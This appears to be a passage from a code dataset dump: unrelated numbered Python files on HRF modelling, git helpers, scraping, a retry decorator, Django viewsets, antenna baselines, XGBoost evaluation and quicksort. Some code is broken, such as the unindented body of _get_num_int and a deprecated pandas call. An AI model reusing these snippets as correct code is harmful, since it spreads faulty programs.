'sm': 2210,
'sn': 818,
'so': 11313,
'sp': 6560,
'sq': 323,
'sr': 385,
'ss': 497,
'st': 11992,
'su': 9496,
'sv': 251,
'sw': 1490,
'sx': 289,
'sy': 1044,
'sz': 702,
't-': 149,
't0': 4,
't1': 14,
't2': 16,
't3': 20,
't4': 8,
't5': 8,
't6': 6,
't7': 9,
't8': 34,
't9': 12,
'ta': 10163,
'tb': 227,
'tc': 353,
'td': 239,
'te': 12576,
'tf': 165,
'tg': 186,
'th': 20347,
'ti': 8367,
'tj': 321,
'tk': 178,
'tl': 273,
'tm': 289,
'tn': 269,
'to': 11512,
'tp': 227,
'tq': 90,
'tr': 12301,
'ts': 469,
'tt': 280,
'tu': 3572,
'tv': 534,
'tw': 2193,
'tx': 266,
'ty': 1588,
'tz': 175,
'u-': 119,
'u0': 3,
'u1': 15,
'u2': 21,
'u3': 9,
'u4': 3,
'u5': 3,
'u6': 3,
'u7': 2,
'u8': 11,
'u9': 5,
'ua': 258,
'ub': 352,
'uc': 350,
'ud': 179,
'ue': 138,
'uf': 188,
'ug': 891,
'uh': 194,
'ui': 127,
'uj': 66,
'uk': 422,
'ul': 536,
'um': 326,
'un': 3354,
'uo': 106,
'up': 2718,
'uq': 59,
'ur': 923,
'us': 6826,
'ut': 474,
'uu': 108,
'uv': 172,
'uw': 165,
'ux': 93,
'uy': 107,
'uz': 97,
'v-': 87,
'v0': 3,
'v1': 8,
'v2': 11,
'v3': 20,
'v4': 8,
'v5': 4,
'v6': 14,
'v7': 2,
'v8': 9,
'v9': 2,
'va': 5048,
'vb': 168,
'vc': 200,
'vd': 140,
've': 2797,
'vf': 111,
'vg': 120,
'vh': 121,
'vi': 8878,
'vj': 91,
'vk': 117,
'vl': 172,
'vm': 152,
'vn': 149,
'vo': 2303,
'vp': 172,
'vq': 76,
'vr': 232,
'vs': 192,
'vt': 174,
'vu': 214,
'vv': 139,
'vw': 105,
'vx': 101,
'vy': 119,
'vz': 97,
'w-': 49,
'w0': 9,
'w1': 15,
'w2': 10,
'w3': 49,
'w4': 11,
'w5': 5,
'w6': 2,
'w7': 5,
'w8': 16,
'w9': 7,
'wa': 13399,
'wb': 160,
'wc': 178,
'wd': 138,
'we': 10270,
'wf': 145,
'wg': 135,
'wh': 7676,
'wi': 8165,
'wj': 154,
'wk': 103,
'wl': 169,
'wm': 219,
'wn': 137,
'wo': 4635,
'wp': 199,
'wq': 78,
'wr': 578,
'ws': 246,
'wt': 170,
'wu': 306,
'wv': 136,
'ww': 2494,
'wx': 193,
'wy': 274,
'wz': 183,
'x-': 157,
'x0': 8,
'x1': 15,
'x2': 61,
'x3': 15,
'x4': 2,
'x5': 8,
'x6': 12,
'x7': 3,
'x8': 5,
'x9': 3,
'xa': 329,
'xb': 191,
'xc': 220,
'xd': 145,
'xe': 282,
'xf': 158,
'xg': 136,
'xh': 144,
'xi': 794,
'xj': 208,
'xk': 79,
'xl': 180,
'xm': 285,
'xn': 107,
'xo': 163,
'xp': 292,
'xq': 82,
'xr': 126,
'xs': 195,
'xt': 344,
'xu': 208,
'xv': 78,
'xw': 84,
'xx': 552,
'xy': 237,
'xz': 171,
'y-': 45,
'y0': 5,
'y1': 6,
'y2': 13,
'y3': 2,
'y5': 5,
'y6': 4,
'y7': 4,
'y8': 3,
'y9': 4,
'ya': 1485,
'yb': 102,
'yc': 195,
'yd': 137,
'ye': 2320,
'yf': 106,
'yg': 116,
'yh': 159,
'yi': 568,
'yj': 136,
'yk': 131,
'yl': 168,
'ym': 174,
'yn': 217,
'yo': 4580,
'yp': 214,
'yq': 89,
'yr': 98,
'ys': 233,
'yt': 248,
'yu': 779,
'yv': 101,
'yw': 155,
'yx': 142,
'yy': 176,
'yz': 169,
'z-': 40,
'z0': 4,
'z1': 6,
'z2': 6,
'z3': 5,
'z4': 1,
'z5': 4,
'z7': 2,
'z8': 1,
'z9': 3,
'za': 920,
'zb': 144,
'zc': 129,
'zd': 141,
'ze': 1083,
'zf': 95,
'zg': 277,
'zh': 651,
'zi': 676,
'zj': 315,
'zk': 102,
'zl': 176,
'zm': 120,
'zn': 117,
'zo': 741,
'zp': 107,
'zq': 131,
'zr': 148,
'zs': 167,
'zt': 102,
'zu': 336,
'zv': 70,
'zw': 126,
'zx': 108,
'zy': 171,
'zz': 266,
}
|
4,340 | 596ee5568a32c3044e797375fbc705e2091f35c2 | from functools import partial
import numpy as np
import scipy.stats as sps
# SPMs HRF
def spm_hrf_compat(t,
                   peak_delay=6,
                   under_delay=16,
                   peak_disp=1,
                   under_disp=1,
                   p_u_ratio = 6,
                   normalize=True,
                   ):
    """ SPM HRF function from sum of two gamma PDFs
    This function is designed to be partially compatible with SPMs `spm_hrf.m`
    function.
    The SPM HRF is a *peak* gamma PDF (with location `peak_delay` and dispersion
    `peak_disp`), minus an *undershoot* gamma PDF (with location `under_delay`
    and dispersion `under_disp`, and divided by the `p_u_ratio`).
    Parameters
    ----------
    t : array-like
        vector of times at which to sample HRF
    peak_delay : float, optional
        delay of peak
    peak_disp : float, optional
        width (dispersion) of peak
    under_delay : float, optional
        delay of undershoot
    under_disp : float, optional
        width (dispersion) of undershoot
    p_u_ratio : float, optional
        peak to undershoot ratio. Undershoot divided by this value before
        subtracting from peak.
    normalize : {True, False}, optional
        If True, scale HRF values so their maximum is 1 before returning.
    Returns
    -------
    hrf : array
        vector length ``len(t)`` of samples from HRF at times `t`
    Raises
    ------
    ValueError
        If any delay or dispersion parameter is not strictly positive.
    Notes
    -----
    See ``spm_hrf.m`` in the SPM distribution.
    """
    if any(v <= 0 for v in (peak_delay, peak_disp, under_delay, under_disp)):
        raise ValueError("delays and dispersions must be > 0")
    # accept any array-like for t (list, tuple, ndarray)
    t = np.asarray(t)
    # gamma.pdf only defined for t > 0; t <= 0 samples stay at 0
    # NOTE: np.float alias was removed in NumPy 1.24 -- use builtin float
    hrf = np.zeros(t.shape, dtype=float)
    pos_t = t[t > 0]
    peak = sps.gamma.pdf(pos_t,
                         peak_delay / peak_disp,
                         loc=0,
                         scale=peak_disp)
    undershoot = sps.gamma.pdf(pos_t,
                               under_delay / under_disp,
                               loc=0,
                               scale=under_disp)
    hrf[t > 0] = peak - undershoot / p_u_ratio
    if not normalize:
        return hrf
    # scale so the peak of the HRF is exactly 1
    return hrf / np.max(hrf)
def _get_num_int(lf, dt=0.02, t=50):
# numerical integral of numerical function
tt = np.arange(dt,t+dt,dt)
return lf(tt).sum() * dt
_spm_can_int = _get_num_int(partial(spm_hrf_compat, normalize=True))
def spmt(t):
    """SPM canonical HRF sampled at time values `t`.

    Delegates to :func:`spm_hrf_compat` with its defaults, which match SPM:
    response delay 6 s, undershoot delay 16 s, both dispersions 1,
    response/undershoot ratio 6, onset 0, kernel length 32 s.
    Values are normalized so the peak equals 1.
    """
    # normalize=True is the spm_hrf_compat default; stated explicitly nowhere
    # else, so rely on the default here.
    return spm_hrf_compat(t)
def dspmt(t):
    """SPM canonical HRF temporal derivative at time values `t`.

    Computed, as in SPM, by the backward finite difference of the canonical
    HRF: the HRF at `t` minus the HRF at `t - 1`.
    """
    times = np.asarray(t)
    return spmt(times) - spmt(times - 1)
_spm_dd_func = partial(spm_hrf_compat, normalize=True, peak_disp=1.01)
def ddspmt(t):
    """SPM canonical HRF dispersion derivative at time values `t`.

    Finite-difference approximation: the canonical HRF minus an HRF whose
    peak dispersion is perturbed to 1.01, divided by the 0.01 step.
    """
    canonical = spmt(t)
    perturbed = _spm_dd_func(t)
    return (canonical - perturbed) / 0.01
4,341 | 3788888a17e2598e781803f89cd63ac9c3219f59 | import os
import json
def load_json_if_exists(path):
    """Parse the JSON file at *path*; return an empty dict when it is not a regular file."""
    if os.path.isfile(path):
        with open(path) as handle:
            return json.load(handle)
    return {}
def json_dump(obj, file_path):
    """Serialize *obj* as JSON into *file_path*, overwriting any existing file."""
    with open(file_path, 'w') as handle:
        json.dump(obj, handle)
def get_folder_paths(directory):
    """Return full paths of the immediate subdirectories of *directory* (os.listdir order)."""
    entries = (os.path.join(directory, name) for name in os.listdir(directory))
    return [entry for entry in entries if os.path.isdir(entry)]
def file_to_lines(file_path):
    """Return the lines of *file_path* without line endings; an empty path yields []."""
    if len(file_path) == 0:
        return []
    with open(file_path) as handle:
        content = handle.read()
    return content.splitlines()
def get_repo_path(file_path):
    """Walk upward from *file_path* looking for the enclosing git repository root.

    Returns None if the walk reaches the filesystem root first. The walk is
    bounded to 100 parent steps; when the bound is exhausted the last visited
    path is returned unchanged (preserving the original behavior).
    """
    if os.path.isfile(file_path):
        current = os.path.abspath(os.path.join(file_path, os.pardir))
    else:
        current = file_path
    for _ in range(100):
        if current == '/':
            return None
        if is_repo_path(current):
            break
        current = os.path.abspath(os.path.join(current, os.pardir))
    return current
def is_repo_path(path):
    """True when *path* is a directory that directly contains a '.git' entry."""
    if not os.path.isdir(path):
        return False
    return '.git' in os.listdir(path)
class LineNumberTracker:
    '''
    Maps original line numbers to their current positions after a series of
    recorded line insertions and deletions on a file.
    '''
    def __init__(self):
        # (is_add, start, end) edits, replayed in the order they were recorded
        self._log = []
    def transform(self, line_num):
        """Return where the original *line_num* now lives; assert if it was deleted."""
        for is_add, start, end in self._log:
            if line_num < start:
                continue  # edit lies entirely after this line; no shift
            if not is_add and line_num < end:
                assert False, 'Line Deleted: {} {}'.format(line_num, self._log)
            size = end - start
            line_num = line_num + size if is_add else line_num - size
        return line_num
    def remove_lines(self, start, end):
        """Record deletion of the half-open line range [start, end)."""
        self._log.append((False, start, end))
    def add_lines(self, start, end):
        """Record insertion of the half-open line range [start, end)."""
        self._log.append((True, start, end))
|
4,342 | 59ddb85d55c342342be4edc1fc3b92af701fa6cc | import BST
# Build a small binary search tree rooted at 10 and print its height.
tree = BST.BST(10)
tree.insert(5, tree.root)
tree.insert(15, tree.root)
tree.insert(25, tree.root)
tree.insert(12, tree.root)
tree.insert(35, tree.root)
print(tree.height(tree.root))  # height as computed by the project-local BST module
4,343 | d46035699bee1ad9a75ea251c2c3ab8817d6a740 | # Import packages
import pandas
import requests
import lxml
# Get page content
# Fetch the archived Yahoo fantasy schedule page and parse its HTML tables.
url = "https://archive.fantasysports.yahoo.com/nfl/2017/189499?lhst=sched#lhstsched"
html = requests.get(url).content  # raw response bytes; read_html accepts bytes
df_list = pandas.read_html(html)  # one DataFrame per <table> element on the page
# Pull relevant URLs
|
4,344 | 79e4592d5ea84cc7c97d68a9390eb5d387045cf0 | from functools import wraps
from time import sleep
def retry(retry_count = 2, delay = 5, action_description = 'not specified', allowed_exceptions=()):
    """Decorator that retries a function up to *retry_count* times.

    Only exceptions listed in *allowed_exceptions* are caught; anything else
    propagates immediately. *delay* seconds are slept between attempts (not
    after the final failure). On success the wrapped function's return value
    is passed through; once every attempt has failed, None is returned
    (matching the original contract).

    Fixes: the original printed "Retrying to execute ..." once AFTER the loop,
    when no retry would follow, and slept pointlessly after the last attempt.
    """
    def decorator(func):
        @wraps(func)  # preserve metadata of the function to be decorated
        def wrapper(*args, **kwargs):
            for attempt in range(retry_count):
                try:
                    return func(*args, **kwargs)
                except allowed_exceptions as e:
                    print('Error executing {}: {}'.format(func.__name__, e))
                    if attempt < retry_count - 1:
                        # another attempt follows: wait, then announce the retry
                        print('Waiting for {} sec before executing {} again'.format(delay, func.__name__))
                        sleep(delay)
                        print('Retrying to execute ' + func.__name__ + ' (action: ' + action_description + ')')
            # every attempt raised an allowed exception
            print('Giving up on {} after {} attempts (action: {})'.format(func.__name__, retry_count, action_description))
            return None
        return wrapper
    return decorator
4,345 | 4d0f612c74dc175766f489580fc4a492e1bfd085 | import pandas as pd
import math
import json
import html
import bs4
import re
import dateparser
from bs4 import BeautifulSoup
from dataclasses import dataclass, field
from datetime import datetime
from typing import Any, List, Dict, ClassVar, Union
from urllib.parse import urlparse
from .markdown import MarkdownData, MarkdownDocument
Url = str
@dataclass
class Action:
    """ The class for an action we want to track.
    This class is used to manage the data of an individual Action. It is used
    to perform the following:
    - set mandatory/optional fields
    - set meta fields
    - cast and validate data so that it knows how to read datafields from
      markdown and dataframes
    - output actions as for dataframes and markdown
    - create and populate action instances from markdown and dataframes
    """

    date: str
    sources: List[Url]
    action: str
    struggles: List[str]
    description: str
    locations: List[str] = None
    companies: List[str] = None
    workers: int = None
    tags: List[str] = None
    author: str = None
    _meta_fields: ClassVar = ["author"]
    _valid_struggles: ClassVar = [
        "ethics",
        "pay_and_benefits",
        "working_conditions",
        "discrimination",
        "unfair_labor_practices",
        "job_security",
    ]
    _valid_actions: ClassVar = [
        "strike",
        "protest",
        "open_letter",
        "legal_action",
        "union_drive",
        "union_representation",
    ]
    @staticmethod
    def is_none(field: Any) -> bool:
        """True when *field* represents a missing value: None, NaN, 'none', or an empty list."""
        if field is None:
            return True
        elif isinstance(field, float) and math.isnan(field):
            return True
        elif isinstance(field, str) and field.lower() == "none":
            return True
        elif isinstance(field, (list,)) and len(field) == 0:
            return True
        else:
            return False
    def listify(self, field: Union[List[Any], Any]) -> List[Any]:
        """Normalize a comma-separated string (or list) to a list; missing values become None."""
        if self.is_none(field):
            return None
        else:
            if isinstance(field, (list,)):
                return field
            else:
                return [s.strip().lower() for s in field.split(",")]
    def __post_init__(self):
        """ Used to validate fields. """
        # self.date = datetime.strptime(self.date, "%Y-%m-%d").date()
        self.date = dateparser.parse(self.date).date()
        self.sources = self.listify(self.sources)
        self.struggles = self.listify(self.struggles)
        self.action = self.action.strip().lower()
        self.companies = self.listify(self.companies)
        self.tags = self.listify(self.tags)
        self.locations = self.listify(self.locations)
        self.workers = None if self.is_none(self.workers) else int(self.workers)
        # make sure action is a valid action
        assert (
            self.action in self._valid_actions
        ), f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
        # make sure all struggles are valid struggles
        for struggle in self.struggles:
            assert (
                struggle in self._valid_struggles
            ), f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
        # make sure source is either a url or a html link tag <a>
        for source in self.sources:
            # BUGFIX: the original used `netloc is not ""` — an identity check
            # against a string literal (SyntaxWarning on Python 3.8+), not an
            # equality check. Use != to actually test for a non-empty netloc.
            assert (
                BeautifulSoup(source, "html.parser").a is not None
                or urlparse(source).netloc != ""
            ), f"'{source}' is invalid. source must be a valid url or an html link tag element"
        # if html, extract only href from sources
        self.sources = [
            BeautifulSoup(source, "html.parser").a["href"]
            if "href" in source
            else source
            for source in self.sources
        ]
    def __lt__(self, other):
        """ Used to make Actions sortable (by date). """
        return self.date < other.date
    def __eq__(self, other):
        """ Overrides the default implementation for equality. """
        if isinstance(other, Action):
            return self.__dict__.items() == other.__dict__.items()
        return False
    def to_df(self) -> Dict[str, Any]:
        """ Return dict of all fields serialized to string """
        return {key: self.render_df(key) for key, value in self.__dict__.items()}
    def render_df(self, field: str) -> str:
        """ Return the value of the field rendered for df. """
        value = self.__getattribute__(field)
        if field in ["date", "workers"]:
            return str(value)
        elif field in ["locations", "struggles", "companies", "tags", "sources"]:
            # render list fields as a bare comma-separated string
            return str(value).strip("[").strip("]").replace("'", "").replace('"', "")
        else:
            return value
    def to_md(self, field: str, td: bs4.element.Tag) -> str:
        """ Convert field for markdown
        Takes a td BeautifulSoup object and updates it according to the field
        type so that it renders correctly in markdown.
        """
        assert (
            field in self.__dataclass_fields__
        ), f"Cannot serialize {field}. Not a valid field in Action."
        value = self.__getattribute__(field)
        if field in ["date", "workers"]:
            td.string = str(value)
        elif field in ["locations", "struggles", "companies", "tags"]:
            td.string = (
                str(value).strip("[").strip("]").replace("'", "").replace('"', "")
            )
        elif field == "sources":
            # render each source as a link labelled with its hostname
            ret = []
            for source in value:
                tag = (
                    f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
                )
                ret.append(tag)
            td.append(BeautifulSoup(html.unescape(", ".join(ret)), "html.parser"))
        else:
            td.string = value
        return td
    @classmethod
    def create_from_md(cls, table: bs4.element.Tag) -> "Action":
        """ Create an Action instance from a md table. """
        a = {}
        trs = table.find_all("tr")
        # meta fields (e.g. author) are stored as attributes on the <table> tag
        for key, val in table.attrs.items():
            if key != "class":
                a[key] = val
        for i, tr in enumerate(trs):
            td_key = tr.find("td", class_="field-key")
            td_val = tr.find("td", class_="field-value")
            val = "".join(str(e) for e in td_val.contents).strip()
            key = "".join(str(e) for e in td_key.contents).strip()
            a[key] = val
        return cls(**a)
    @classmethod
    def create_from_row(cls, row: pd.Series) -> "Action":
        """ Create an Action instance from a dataframe row. """
        fields = [
            key
            for key, value in cls.__dataclass_fields__.items()
            if value.type != ClassVar
        ]
        d = {key: value for key, value in row.to_dict().items() if key in fields}
        return cls(**d)
@dataclass
class Actions:
    """ The class for a set of actions.
    This class is a collection of actions. It is used to for the four primary
    usecases:
    - to serialize the list of actions into a dataframe
    - to serialize the list of actions into a markdown/html table
    - to create and populate an Actions instance from a dataframe
    - to create and populate an Actions instance from a markdown document
    """

    # id of the wrapping <div> used when round-tripping through markdown/HTML
    action_id: ClassVar = "actions"
    actions: List[Action] = field(default_factory=lambda: [])
    # non-ClassVar field names of Action, in declaration order; fixes column order
    fields: List[str] = field(
        default_factory=lambda: [
            key
            for key, value in Action.__dataclass_fields__.items()
            if value.type != ClassVar
        ]
    )
    def __len__(self) -> int:
        """ Get the number of actions. """
        return len(self.actions)
    def __eq__(self, other):
        """ Overrides the default implementation for equality. """
        if isinstance(other, Actions):
            return self.actions == other.actions
        return False
    def sort(self, *args, **kwargs) -> "Actions":
        """ Sorts the list of actions (in place; returns self for chaining). """
        self.actions.sort(*args, **kwargs)
        return self
    def append(self, action: Action):
        """ Append an action onto this instance of Actions. """
        self.actions.append(action)
    def to_df(self) -> pd.DataFrame:
        """ Converts this instance of Actions to a df. """
        data = []
        for action in self.actions:
            data.append(action.to_df())
        # round-trip through JSON so pandas infers uniform column dtypes
        df = pd.read_json(json.dumps(data), orient="list")
        return df[self.fields]
    def to_md(self):
        """ Convert this instance of Actions to markdown/HTML.

        Emits one <table> per action inside a <div id="actions">; meta fields
        (e.g. author) become attributes on the <table> tag, other fields
        become field-key/field-value <td> pairs.
        """
        soup = BeautifulSoup(f"<div id={self.action_id}></div>", "html.parser")
        for action in self.actions:
            table = soup.new_tag("table")
            soup.div.append(table)
            for meta_field in Action._meta_fields:
                table[meta_field] = action.__getattribute__(meta_field)
            for field in self.fields:
                # skip missing values and meta fields (already table attributes)
                if action.__getattribute__(field) is None:
                    continue
                if field in Action._meta_fields:
                    continue
                tr = soup.new_tag("tr")
                td_key = soup.new_tag("td", attrs={"class": "field-key"})
                td_val = soup.new_tag("td", attrs={"class": "field-value"})
                td_key.string = field
                td_val = action.to_md(field, td_val)
                tr.append(td_key)
                tr.append(td_val)
                table.append(tr)
        return soup.prettify()
    @classmethod
    def read_from_md(cls, md_doc: MarkdownDocument) -> "Actions":
        """ Create and populate an Actions instance from a Markdown Document. """
        # locate the single <div id="actions"> blob embedded in the document
        md_data = re.findall(fr'<div id="{cls.action_id}">+[\s\S]+<\/div>', md_doc)
        assert len(md_data) == 1, f"multiple divs with id={cls.action_id} were found"
        md_data = md_data[0]
        soup = BeautifulSoup(md_data, "html.parser")
        tables = soup.div.find_all("table")
        actions = Actions()
        for table in tables:
            action = Action.create_from_md(table)
            actions.append(action)
        return actions
    @staticmethod
    def read_from_df(df: pd.DataFrame) -> "Actions":
        """ Create and populate an Actions instance from a dataframe. """
        actions = Actions()
        for i, row in df.iterrows():
            action = Action.create_from_row(row)
            actions.append(action)
        return actions
|
4,346 | bedae2621bfcc64deb0d13d7cbce3cfb89720245 | from rest_framework import viewsets
from .models import *
from serializer import *
from django.http import HttpResponse
from django.views import View
from django.core import serializers
# Create your views here.
class ProyectoViewSet(viewsets.ModelViewSet):
    # Full CRUD REST endpoints for Proyecto records.
    queryset = Proyecto.objects.all()
    serializer_class = ProyectoSerializer
class UsuarioViewSet(viewsets.ModelViewSet):
    # Full CRUD REST endpoints for Usuario records.
    queryset = Usuario.objects.all()
    serializer_class = UsuariosSerializer
class SistemaViewSet(viewsets.ModelViewSet):
    # Full CRUD REST endpoints for Sistema records.
    queryset = Sistema.objects.all()
    serializer_class = SistemaSerializer
class ProyectoSistemaViewSet(viewsets.ModelViewSet):
    # Full CRUD REST endpoints for the Proyecto-Sistema association table.
    queryset = ProyectoSistema.objects.all()
    serializer_class = ProyectoSistemaSerializer
class UsuarioProyectoSistemaViewSet(viewsets.ModelViewSet):
    # Full CRUD REST endpoints for the Usuario-Proyecto-Sistema association table.
    queryset = UsuarioProyectoSistema.objects.all()
    serializer_class = UsuarioProyectoSistemaSerializer
class ProyectoSistemaView(View):
    # Plain Django view: GET returns every ProyectoSistema row serialized as JSON.
    def get(self, request):
        data = ProyectoSistema.objects.all()
        json = serializers.serialize('json', data)  # local name shadows any json module import
        return HttpResponse(json, content_type='application/json')
|
4,347 | eefd94e7c04896cd6265bbacd624bf7e670be445 | """
Given a sentence as `txt`, return `True` if any two adjacent words have this
property: One word ends with a vowel, while the word immediately after begins
with a vowel (a e i o u).
### Examples
vowel_links("a very large appliance") ➞ True
vowel_links("go to edabit") ➞ True
vowel_links("an open fire") ➞ False
vowel_links("a sudden applause") ➞ False
### Notes
You can expect sentences in only lowercase, with no punctuation.
"""
def vowel_links(txt):
    """Return True if any word ends with a vowel while the next word starts with one.

    Assumes lowercase words separated by single spaces with no punctuation
    (per the problem statement above). Single-word or empty input gives False.

    Replaces the original's per-call `import re` and regex searches with a
    simple set-membership check on the boundary characters.
    """
    vowels = set("aeiou")
    words = txt.split(' ')
    # pair each word with its successor and inspect the boundary letters
    return any(
        left[-1] in vowels and right[0] in vowels
        for left, right in zip(words, words[1:])
    )
|
4,348 | 9969dcf820a5ff34b483593cd43e4dfba9588ed2 | import sys
from . import cli
def main() -> None:
    """CLI entry point: forward the program name and arguments to cli.main,
    exiting quietly (no traceback) on Ctrl-C."""
    try:
        command = sys.argv[0]  # program name as invoked
        args = sys.argv[1:]
        cli.main(command, args)
    except KeyboardInterrupt:
        # suppress the default KeyboardInterrupt traceback on user interrupt
        pass
|
4,349 | c455263b82c04fe2c5cc1e614f10a9962795f87e | """
Utilities for calculations based on antenna positions,
such as baseline and phase factor.
"""
import os
import numpy as np
import pickle
c = 299792458 # m / s
data_prefix = os.path.dirname(os.path.abspath(__file__)) + "/"
try:
    # Antenna positions keyed by antenna ID, loaded once at import time.
    # NOTE(review): file handle from open() is never closed — presumably fine
    # for a one-shot import-time read, but a `with` block would be cleaner.
    ant_pos = dict(pickle.load(open(data_prefix + "ant_dict.pk", "rb")))
    def baselength(ant_ID1, ant_ID2):
        """
        (Convenience function)
        Return the norm of the baseline between antennae
        # @ant_ID1 and @ant_ID2
        """
        return np.linalg.norm(baseline(ant_ID1, ant_ID2))
    def baseline(ant_ID1, ant_ID2):
        """
        Calculate the baseline between antennae
        # @ant_ID1 and @ant_ID2
        by a simple difference of their coordinates.
        """
        return ant_pos[ant_ID2] - ant_pos[ant_ID1]
    def phase_factor(ant1, ant2, r, nu=151e6):
        """
        Calculate the phase factor in the direction @r (l, m)
        (we assume that n is of insignificant magnitude)
        and at the frequency @nu
        between two antennae whose ID #s are @ant1 and @ant2.
        When we calculate the baseline (u, v, w), we
        assume that w is of insignificant magnitude.
        """
        b = baseline(ant1, ant2)[0:2] # kill w
        br = np.dot(b, r)
        # complex exponential e^{-2*pi*i * nu * (b . r) / c}
        return np.exp(-2j * np.pi * nu * br / c)
except FileNotFoundError:
    # functions above are only defined when the pickle loads successfully
    print("Failure to load antennae data.")
|
4,350 | c0512a90b6a4e50c41d630f6853d1244f78debfb | #dict1 = {"я":"i","люблю":"love","Питон":"Рython"}
#user_input = input("---->")
#print(dict1[user_input])
#list1 =[i for i in range(0,101) if i%7 ==0 if i%5 !=0]
#print(list1)
#stroka = "я обычная строка быть которая должна быть длиннее чем десять символ"
#stroka1=stroka.split()
#dict1={}
#for i in stroka1:
# dict1[i] = stroka.count(i)
#print(dict1)
# #ФУНКЦИИ
##1.
##def foo():
## print("Мой любимый фильм ето ",input())
##foo()
##2.
##import random
##def rand():
## rn = random.randint(0,10)
## return rn
##x=rand()
##print(x)
##list1=[]
##for i in range(0,10):
## list1.append(rand())
##print(list1)
##3.
##def arifm(*x):
## return(sum(x)/len(x))
##print(arifm(1,2,4,5,6))
##4.
##def dict2(x,y):
## return {x:y}
##dict1 = {}
##dict1.update(dict2("GB","London"))
##print(dict1)
##dict5 = {}
##dict5.update(dict2("Hungary","Budapest"))
##print(dict5)
|
4,351 | 37d465043eddd34c4453fd7e31b08d0ba58b725f | #https://www.acmicpc.net/problem/2581
def isPrime(x):
    """Return True when x (a positive integer) is prime.

    Replaces the original's off-by-one candidate loop (`d+1` over
    `range(1, int(x**0.5))` with a skip for `x == d+1`) with direct trial
    division over 2..floor(sqrt(x)), which covers the same divisors.
    """
    if x==1:
        return False
    # trial division: any factor pair has one member <= sqrt(x)
    for d in range(2, int(x**0.5) + 1):
        if x % d == 0:
            return False
    return True
# Read a range [N, M]; print the sum of its primes and the smallest prime,
# or -1 when the range contains none (Baekjoon 2581).
N=int(input())
M=int(input())
sum=0  # NOTE(review): shadows builtin sum(); kept as-is
min=10001  # sentinel above the problem's maximum (M <= 10000); shadows builtin min()
for x in range(N,M+1):
    if isPrime(x):
        sum+=x
        if min>x:
            min=x
if sum==0:
    # no prime found in [N, M]
    print(-1)
else:
    print(sum)
    print(min)
|
4,352 | 3cace66ddf8484d285c2b2a8fabbb83778a2c4af | from __future__ import division
import numpy as np
# Assemble a LaTeX tabular summarizing the final-epoch metrics (loss,
# training accuracy, validation accuracy) of each out-h<h>.txt training run.
table = open("Tables\\table1.txt", "w")
table.write("\\begin{tabular}{|c|c|c|c|} \\hline\n")
table.write("Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n")
H = [1,5,10,11,12,20,40]  # hidden-layer sizes that were trained
for h in H:
    file = open("Out\\out-h"+str(h)+".txt", "r")
    line = file.readlines()[-1]  # last line holds the final epoch's metrics
    file.close()
    # expected comma-separated layout: <epoch>,<loss>,<train acc>,<valid acc>
    line = line.split(",")
    loss = line[1]
    acc_tr = line[2]
    acc_va = line[3]
    table.write(str(h)+" & "+loss+" & "+acc_tr+" & "+acc_va+" \\\\\n")
table.write("\\hline\n")
table.write("\\end{tabular}")
table.close()
|
4,353 | e2682a5cab95914e7567431cb04c3fb542eda3bf | import numpy as np
import pandas as pd
import xgboost as xgb
from sklearn.metrics import confusion_matrix
# Evaluate a previously trained XGBoost binary classifier on dataset.csv and
# print its confusion matrix, optionally staging arrays through on-disk
# memmaps to cap resident memory.
USE_MEMMAP = True
data = pd.read_csv( 'dataset.csv' ).as_matrix()  # NOTE(review): as_matrix() was removed in pandas 1.0; .to_numpy() is the modern call
X = data[ :, 0:-1 ]  # every column but the last is a feature
y = data[ :, -1 ]    # last column is the binary label
if USE_MEMMAP:
    # copy both arrays into disk-backed memmaps, then drop the in-memory copies
    Xmm = np.memmap( 'X.mmap', dtype=X.dtype, mode='w+', shape=X.shape )
    ymm = np.memmap( 'y.mmap', dtype=y.dtype, mode='w+', shape=y.shape )
    np.copyto( Xmm, X )
    np.copyto( ymm, y )
    del( data )
    del( X )
    del( y )
    X = Xmm
    y = ymm
d = xgb.DMatrix( X, label=y )
model = xgb.Booster({'nthread':1})
model.load_model('xgb-model.bin')  # pre-trained model produced elsewhere
cm = confusion_matrix(y, model.predict(d) > 0.5)  # threshold probabilities at 0.5
print(cm)
|
4,354 | 52513bf3f50726587bee800f118e2ac0fa00d98b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def quick_sort(a):
    """Sort list *a* in place via quicksort; returns the same list for convenience."""
    _quick_sort(a, 0, len(a)-1)
    return a
def _quick_sort(a, lo, hi):
    # recurse only while the slice a[lo..hi] holds at least two elements
    if lo < hi:
        j = partition2(a, lo, hi)
        # a[j] is assumed to be in final position; sort both sides around it
        _quick_sort(a, lo, j-1)
        _quick_sort(a, j+1, hi)
def partition(a, lo, hi):
    """Lomuto partition of a[lo..hi] around pivot a[lo]; returns the pivot's final index."""
    pivot_value = a[lo]
    boundary = lo  # last index of the "< pivot" region grown so far
    idx = lo
    while idx <= hi:
        if a[idx] < pivot_value:
            boundary += 1
            a[idx], a[boundary] = a[boundary], a[idx]
        idx += 1
    # place the pivot between the two regions
    a[lo], a[boundary] = a[boundary], a[lo]
    return boundary
def partition2(a, lo, hi):
    """Hoare-style partition of a[lo..hi] around pivot a[lo].

    Returns the pivot's final index j, with a[lo..j-1] <= a[j] <= a[j+1..hi],
    as required by _quick_sort's exclusion of index j.

    Fixes two defects in the original:
    - pointers never advanced past elements equal to the pivot, so inputs
      with duplicates (e.g. [1, 1]) looped forever;
    - the final pivot placement `a[lo], a[l] = a[lo], a[l]` was a no-op swap.
    """
    pivot = a[lo]
    l = lo + 1
    h = hi
    while True:
        # scan right past elements strictly below the pivot
        while l <= h and a[l] < pivot:
            l += 1
        # scan left past elements strictly above the pivot
        while l <= h and a[h] > pivot:
            h -= 1
        if l > h:
            break
        # both pointers stopped (>= / <= pivot): swap and ADVANCE BOTH,
        # which guarantees progress even when a[l] == a[h] == pivot
        a[l], a[h] = a[h], a[l]
        l += 1
        h -= 1
    # h now sits on the last element <= pivot; put the pivot there
    a[lo], a[h] = a[h], a[lo]
    return h
if __name__ == '__main__':
    d = [34,2,24,12, 45,33,9,99]
    # parenthesized print is valid in both Python 2 (statement with a
    # parenthesized expression) and Python 3 (function call); the original
    # bare `print quick_sort(d)` is a SyntaxError under Python 3
    print(quick_sort(d))
|
4,355 | f0702c8555ef07aac9e667c35b5b5fd85820ec54 | # from https://web.archive.org/web/20121220025758/http://xkcd.com/actuary.py.txt
